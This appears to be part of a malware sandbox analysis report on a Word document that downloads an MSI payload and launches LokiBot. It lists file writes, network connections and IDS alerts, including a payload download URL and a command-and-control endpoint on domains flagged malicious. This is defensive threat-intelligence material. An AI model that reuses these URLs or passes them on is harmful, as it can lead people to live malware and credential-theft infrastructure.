| 1264 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:— | SHA256:— | |||
| 1264 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\ac1b391230816b46484610a4b474eb4d0996eef57b0a147f341297204cd191f0.xml.LNK | lnk | |
MD5:— | SHA256:— | |||
| 1264 | WINWORD.EXE | C:\Users\admin\Desktop\~$1b391230816b46484610a4b474eb4d0996eef57b0a147f341297204cd191f0.xml | pgc | |
MD5:— | SHA256:— | |||
| 2932 | msiexec.exe | C:\Windows\Installer\MSI4C46.tmp | executable | |
MD5:— | SHA256:— | |||
| 2932 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.dat | dat | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
1588 | MSI4F66.tmp | POST | — | 209.182.209.40:80 | http://parkerhdd.com/wp-admin/network/five/fre.php | US | — | — | malicious |
2932 | msiexec.exe | GET | 200 | 23.229.196.4:80 | http://socaleights.com//images/2014/jzfdyijsh.msi | US | executable | 964 Kb | malicious |
1588 | MSI4F66.tmp | POST | — | 209.182.209.40:80 | http://parkerhdd.com/wp-admin/network/five/fre.php | US | — | — | malicious |
1588 | MSI4F66.tmp | POST | — | 209.182.209.40:80 | http://parkerhdd.com/wp-admin/network/five/fre.php | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
1588 | MSI4F66.tmp | 209.182.209.40:80 | parkerhdd.com | InMotion Hosting, Inc. | US | malicious |
2932 | msiexec.exe | 23.229.196.4:80 | socaleights.com | GoDaddy.com, LLC | US | malicious |
Domain | IP | Reputation |
|---|---|---|
socaleights.com |
| malicious |
parkerhdd.com |
| malicious |
PID | Process | Class | Message |
|---|---|---|---|
2932 | msiexec.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic |
2932 | msiexec.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] Executable application_x-msi Download |
2932 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] Executable ExeToMSI Download |
1588 | MSI4F66.tmp | A Network Trojan was detected | ET TROJAN LokiBot User-Agent (Charon/Inferno) |
1588 | MSI4F66.tmp | A Network Trojan was detected | ET TROJAN LokiBot Checkin |
1588 | MSI4F66.tmp | A Network Trojan was detected | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 |
1588 | MSI4F66.tmp | A Network Trojan was detected | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 |
1588 | MSI4F66.tmp | A Network Trojan was detected | MALWARE [PTsecurity] Loki Bot Check-in M2 |
1588 | MSI4F66.tmp | A Network Trojan was detected | ET TROJAN LokiBot User-Agent (Charon/Inferno) |
1588 | MSI4F66.tmp | A Network Trojan was detected | ET TROJAN LokiBot Checkin |